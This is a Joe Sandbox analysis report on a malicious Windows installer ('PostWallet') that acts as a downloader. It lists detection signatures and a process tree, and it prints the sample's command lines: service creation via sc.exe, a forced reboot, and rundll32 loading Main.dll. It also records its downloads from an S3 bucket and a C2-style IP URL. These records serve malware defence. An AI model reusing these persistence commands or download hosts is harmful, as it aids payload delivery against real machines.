Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
00023948209303294#U00ac320302282349843984903.exe

Overview

General Information

Sample name:00023948209303294#U00ac320302282349843984903.exe
renamed because original name is a hash value
Original sample name:00023948209303294320302282349843984903.exe
Analysis ID:1404607
MD5:9e1e30202d950ce1f273eb2e8492f39b
SHA1:4d76edbdb6976aa2acbbe9c4264a6fc9176584ff
SHA256:ddef5168dd82c49304884fd4fb0720a865588dad07f1350ee2eba97cf15ee4c7
Tags:exe
Infos:

Detection

Score:80
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Contain functionality to detect virtual machines
Machine Learning detection for dropped file
Uses shutdown.exe to shutdown or reboot the system
Yara detected Generic Downloader
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains capabilities to detect virtual machines
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops files with a non-matching file extension (content does not match file extension)
Extensive use of GetProcAddress (often used to hide API calls)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found evasive API chain checking for process token information
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains executable resources (Code or Archives)
PE file contains sections with non-standard names
PE file does not import any functions
Queries keyboard layouts
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Conhost Spawned By Uncommon Parent Process
Stores files to the Windows start menu directory
Tries to load missing DLLs
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • 00023948209303294#U00ac320302282349843984903.exe (PID: 6752 cmdline: "C:\Users\user\Desktop\00023948209303294#U00ac320302282349843984903.exe" --rerunningWithoutUAC MD5: 9E1E30202D950CE1F273EB2E8492F39B)
    • Update.exe (PID: 6772 cmdline: "C:\Users\user\AppData\Local\SquirrelTemp\Update.exe" --install . --rerunningWithoutUAC MD5: A560BAD9E373EA5223792D60BEDE2B13)
      • FilePost?a.exe (PID: 3664 cmdline: "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe" --squirrel-firstrun MD5: 436CEDFA08F245AD52DD221BEC4480A4)
        • conhost.exe (PID: 7084 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • FilePost?a.exe (PID: 3140 cmdline: "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exe" MD5: 436CEDFA08F245AD52DD221BEC4480A4)
          • conhost.exe (PID: 5804 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
          • cmd.exe (PID: 6404 cmdline: "C:\Windows\System32\cmd.exe" /C rundll32.exe "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\Main.dll", ServiceCrtMain MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 2004 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
            • rundll32.exe (PID: 6880 cmdline: rundll32.exe "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\Main.dll", ServiceCrtMain MD5: 889B99C52A60DD49227C5E485A016679)
              • rundll32.exe (PID: 7080 cmdline: rundll32.exe "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\Main.dll", ServiceCrtMain MD5: EF3179D498793BF4234F708D3BE28633)
                • cmd.exe (PID: 3912 cmdline: "C:\Windows\System32\cmd.exe" /C sc create ClassicShellSV binPath= "C:\Program Files\Classic Shell\ClassicIE_64.exe" start= auto MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
                  • conhost.exe (PID: 2496 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                  • sc.exe (PID: 3328 cmdline: sc create ClassicShellSV binPath= "C:\Program Files\Classic Shell\ClassicIE_64.exe" start= auto MD5: 3FB5CF71F7E7EB49790CB0E663434D80)
                • shutdown.exe (PID: 6916 cmdline: C:\WINDOWS\system32\shutdown.exe -r -t 1 -f MD5: F2A4E18DA72BB2C5B21076A5DE382A20)
                  • conhost.exe (PID: 5352 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
                • conhost.exe (PID: 3912 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Configuration

No configs have been found

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
Update.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security

    Dropped Files

    SourceRuleDescriptionAuthorStrings
    C:\Users\user\AppData\Local\PostWallet\Update.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security
      C:\Users\user\AppData\Local\SquirrelTemp\Update.exeJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        2.0.Update.exe.2a0000.0.unpackJoeSecurity_GenericDownloader_1Yara detected Generic DownloaderJoe Security

          Sigma Signatures

          System Summary

          barindex
          Sigma detected: Conhost Spawned By Uncommon Parent Process
          Source: Process startedAuthor: Tim Rauch: Data: Command: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, CommandLine|base64offset|contains: }}, Image: C:\Windows\System32\conhost.exe, NewProcessName: C:\Windows\System32\conhost.exe, OriginalFileName: C:\Windows\System32\conhost.exe, ParentCommandLine: rundll32.exe "C:\Users\user\AppData\Local\PostWallet\app-1.0.0\Main.dll", ServiceCrtMain, ParentImage: C:\Windows\System32\rundll32.exe, ParentProcessId: 7080, ParentProcessName: rundll32.exe, ProcessCommandLine: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1, ProcessId: 3912, ProcessName: conhost.exe
          Sigma detected: New Service Creation Using Sc.EXE
          Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: sc create ClassicShellSV binPath= "C:\Program Files\Classic Shell\ClassicIE_64.exe" start= auto, CommandLine: sc create ClassicShellSV binPath= "C:\Program Files\Classic Shell\ClassicIE_64.exe" start= auto, CommandLine|base64offset|contains: , Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /C sc create ClassicShellSV binPath= "C:\Program Files\Classic Shell\ClassicIE_64.exe" start= auto, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 3912, ParentProcessName: cmd.exe, ProcessCommandLine: sc create ClassicShellSV binPath= "C:\Program Files\Classic Shell\ClassicIE_64.exe" start= auto, ProcessId: 3328, ProcessName: sc.exe

          Snort Signatures

          No Snort rule has matched

          Joe Sandbox Signatures

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Multi AV Scanner detection for dropped file
          Source: C:\Program Files\Classic Shell\ClassicIEDLL_64.dllVirustotal: Detection: 17%Perma Link
          Source: C:\Program Files\Classic Shell\ClassicIE_64.dllVirustotal: Detection: 18%Perma Link
          Multi AV Scanner detection for submitted file
          Source: 00023948209303294#U00ac320302282349843984903.exeVirustotal: Detection: 8%Perma Link
          Machine Learning detection for dropped file
          Source: C:\Program Files\Classic Shell\ClassicIEDLL_64.dllJoe Sandbox ML: detected
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_6D151F30 CryptGenRandom,CryptReleaseContext,3_2_6D151F30
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_6D151E00 CryptReleaseContext,3_2_6D151E00
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_6D151E40 CryptGenRandom,3_2_6D151E40
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_6D151910 CryptAcquireContextA,CryptAcquireContextA,GetLastError,CryptAcquireContextA,CryptAcquireContextA,SetLastError,CryptAcquireContextA,___std_exception_copy,3_2_6D151910
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_6D151A70 CryptAcquireContextA,GetLastError,CryptReleaseContext,3_2_6D151A70
          Source: C:\Users\user\AppData\Local\PostWallet\app-1.0.0\FilePost?a.exeCode function: 3_2_6D18E680 CryptReleaseContext,3_2_6D18E680
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic ShellJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\cacheJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\wvtll.zipJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\wvtll.zip1Jump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicIE_64.exeJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicStartMenu.exeJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicStartMenuDLL.dllJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\PolicyDefinitions.zipJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicExplorer32.dllJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicExplorerSettings.exeJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicIE_32.exeJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicIEDLL_32.dllJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicShellUpdate.exeJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicShellReadme.rtfJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\HISTORY.txtJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\StartMenuHelperL10N.iniJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\StartMenuL10N.iniJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ExplorerL10N.iniJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\SkinsJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Classic Skin.skinJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Classic Skin.skin7Jump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Full Glass.skinJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Metallic.skin7Jump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Metro.skinJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Metro.skin7Jump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Midnight.skin7Jump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Smoked Glass.skinJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Windows 8.skinJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Windows 8.skin7Jump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Windows Aero.skinJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Windows Aero.skin7Jump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Windows Basic.skinJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\Windows XP Luna.skinJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicIE_64.dllJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicIEDLL_64.dllJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\IE Settings.lnkJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Start Menu Settings.lnkJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Start Screen.lnkJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicShell.chmJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\ClassicExplorer64.dllJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\pack01.zipJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\ClassicIE_64.exeJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\MsMpLics.dllJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\OfflineScannerShell.exeJump to behavior
          Source: C:\Windows\System32\rundll32.exeDirectory created: C:\Program Files\Classic Shell\Skins\EppManifest.dllJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeRegistry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\PostWalletJump to behavior
          Source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exeFile created: C:\Users\user\AppData\Local\SquirrelTemp\Squirrel-Install.logJump to behavior
          Source: C:\Windows\System32\rundll32.exeFile created: C:\Program Files\Classic Shell\ClassicShellReadme.rtfJump to behavior
          Source: unknownHTTPS traffic detected: 16.12.1.14:443 -> 192.168.2.4:49729 version: TLS 1.2
          Source: 00023948209303294#U00ac320302282349843984903.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
          Source: Binary string: D:\a\_work\1\s\\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, FilePost?a.exe, 00000003.00000002.4090123823.000000006E391000.00000020.00000001.01000000.00000009.sdmp, FilePost?a.exe, 00000007.00000002.4090125560.000000006E391000.00000020.00000001.01000000.00000009.sdmp, vcruntime140.dll.2.dr
          Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicExplorer\Setup64\ClassicExplorer64.pdb source: ClassicExplorer64.dll.12.dr
          Source: Binary string: netstandard.pdb.mdb source: Update.exe
          Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicStartMenu\Setup64\ClassicStartMenu.pdb source: ClassicStartMenu.exe.12.dr
          Source: Binary string: C:\Users\DeveloperSys\Documents\Embarcadero\Studio\Projects\DLL New Completa\Projeto C++\NovoBaixador\Release\NovoBaixador.pdbO source: FilePost?a.exe, 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000007.00000002.4089857129.000000006D18F000.00000002.00000001.01000000.0000000A.sdmp
          Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicIE\Setup64\ClassicIE_64.pdb source: ClassicIE_64.exe0.12.dr
          Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicExplorer\Setup\ClassicExplorerSettings.pdb source: ClassicExplorerSettings.exe.12.dr
          Source: Binary string: D:\build\ob\bora-20800274\bora\build\build\authd\release\win32\vmware-authd.pdb-- source: Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000003.00000000.1656237951.000000000034A000.00000002.00000001.01000000.00000008.sdmp, FilePost?a.exe, 00000003.00000002.4088991089.000000000034A000.00000002.00000001.01000000.00000008.sdmp, FilePost?a.exe, 00000007.00000000.1668661110.000000000034A000.00000002.00000001.01000000.00000008.sdmp, FilePost?a.exe, 00000007.00000002.4088940375.000000000034A000.00000002.00000001.01000000.00000008.sdmp, FilePost?a.exe.2.dr
          Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicExplorer\Setup\ClassicExplorer32.pdb source: ClassicExplorer32.dll.12.dr
          Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicExplorer\Setup\ClassicExplorerSettings.pdb`BXt< source: ClassicExplorerSettings.exe.12.dr
          Source: Binary string: C:\Users\ani\code\squirrel\squirrel.windows\build\Release\Win32\Setup.pdb source: 00023948209303294#U00ac320302282349843984903.exe
          Source: Binary string: C:\Users\DeveloperSys\Documents\Embarcadero\Studio\Projects\DLL New Completa\Projeto C++\NovoBaixador\Release\NovoBaixador.pdb source: FilePost?a.exe, 00000003.00000002.4089846975.000000006D18F000.00000002.00000001.01000000.0000000A.sdmp, FilePost?a.exe, 00000007.00000002.4089857129.000000006D18F000.00000002.00000001.01000000.0000000A.sdmp
          Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicIE\Setup64\ClassicIE_64.pdb! source: ClassicIE_64.exe0.12.dr
          Source: Binary string: D:\build\ob\bora-20800274\bora\build\build\authd\release\win32\vmware-authd.pdb source: Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe, 00000003.00000000.1656237951.000000000034A000.00000002.00000001.01000000.00000008.sdmp, FilePost?a.exe, 00000003.00000002.4088991089.000000000034A000.00000002.00000001.01000000.00000008.sdmp, FilePost?a.exe, 00000007.00000000.1668661110.000000000034A000.00000002.00000001.01000000.00000008.sdmp, FilePost?a.exe, 00000007.00000002.4088940375.000000000034A000.00000002.00000001.01000000.00000008.sdmp, FilePost?a.exe.2.dr
          Source: Binary string: d:\Work\TestP4\ClassicShell\ClassicExplorer\Setup\ClassicExplorer32.pdbL@ source: ClassicExplorer32.dll.12.dr
          Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00415080 FindFirstFileW,FindClose,12_2_00415080

          Networking

          barindex
          System process connects to network (likely due to code injection or exploit)
          Source: C:\Windows\System32\rundll32.exeNetwork Connect: 16.12.1.14 443Jump to behavior
          Yara detected Generic Downloader
          Source: Yara matchFile source: Update.exe, type: SAMPLE
          Source: Yara matchFile source: 2.0.Update.exe.2a0000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: C:\Users\user\AppData\Local\PostWallet\Update.exe, type: DROPPED
          Source: Yara matchFile source: C:\Users\user\AppData\Local\SquirrelTemp\Update.exe, type: DROPPED
          Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
          Source: global trafficHTTP traffic detected: GET /bucketTc.zip HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bucreate203920233.s3.sa-east-1.amazonaws.comConnection: Keep-Alive
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Windows\System32\rundll32.exeCode function: 12_2_00815430 Sleep,SleepEx,URLDownloadToFileW,Sleep,12_2_00815430
          Source: global trafficHTTP traffic detected: GET /bucketTc.zip HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: bucreate203920233.s3.sa-east-1.amazonaws.comConnection: Keep-Alive
          Source: unknownDNS traffic detected: queries for: bucreate203920233.s3.sa-east-1.amazonaws.com
          Source: ClassicIE_64.dll.12.drString found in binary or memory: http://20.64.96.112/home3/MAOEM1002MMDLA.php?a=
          Source: Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCodeSigningCA-1.crt0
          Source: Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, ClassicIE_64.exe0.12.dr, ClassicExplorerSettings.exe.12.dr, ClassicExplorer64.dll.12.dr, ClassicExplorer32.dll.12.dr, FilePost?a.exe.2.dr, ClassicStartMenu.exe.12.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
          Source: Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
          Source: ClassicIE_64.exe0.12.dr, ClassicExplorerSettings.exe.12.dr, ClassicExplorer64.dll.12.dr, ClassicExplorer32.dll.12.dr, ClassicStartMenu.exe.12.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
          Source: Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
          Source: Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
          Source: Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
          Source: Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.2.drString found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
          Source: Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.2.drString found in binary or memory: http://crl.globalsign.com/root-r3.crl0G
          Source: Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.2.drString found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
          Source: Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
          Source: Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
          Source: ClassicIE_64.exe0.12.dr, ClassicExplorerSettings.exe.12.dr, ClassicExplorer64.dll.12.dr, ClassicExplorer32.dll.12.dr, ClassicStartMenu.exe.12.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
          Source: Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
          Source: Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
          Source: FilePost?a.exe.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
          Source: Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.2.drString found in binary or memory: http://crl3.digicert.com/assured-cs-g1.crl00
          Source: ClassicIE_64.exe0.12.dr, ClassicExplorerSettings.exe.12.dr, ClassicExplorer64.dll.12.dr, ClassicExplorer32.dll.12.dr, ClassicStartMenu.exe.12.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
          Source: Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
          Source: ClassicIE_64.exe0.12.dr, ClassicExplorerSettings.exe.12.dr, ClassicExplorer64.dll.12.dr, ClassicExplorer32.dll.12.dr, ClassicStartMenu.exe.12.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
          Source: Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
          Source: Update.exe, 00000002.00000002.1680892254.00000000027BD000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002794000.00000004.00000800.00020000.00000000.sdmp, FilePost?a.exe.2.drString found in binary or memory: http://crl4.digicert.com/assured-cs-g1.crl0L
          Source: ClassicIE_64.exe0.12.dr, ClassicExplorerSettings.exe.12.dr, ClassicExplorer64.dll.12.dr, ClassicExplorer32.dll.12.dr, ClassicStartMenu.exe.12.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
          Source: Update.exe, 00000002.00000002.1680892254.000000000288A000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002869000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.0000000002997000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.000000000297F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/PostWallet.nuspec
          Source: Update.exe, 00000002.00000002.1680892254.0000000002869000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.000000000297F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/_rels/.rels
          Source: Update.exe, 00000002.00000002.1680892254.0000000002869000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.000000000297F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/lib/net48/FilePost?a.exe
          Source: Update.exe, 00000002.00000002.1680892254.0000000002869000.00000004.00000800.00020000.00000000.sdmp, Update.exe, 00000002.00000002.1680892254.000000000297F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://defaultcontainer/lib/net48/Main1.dll
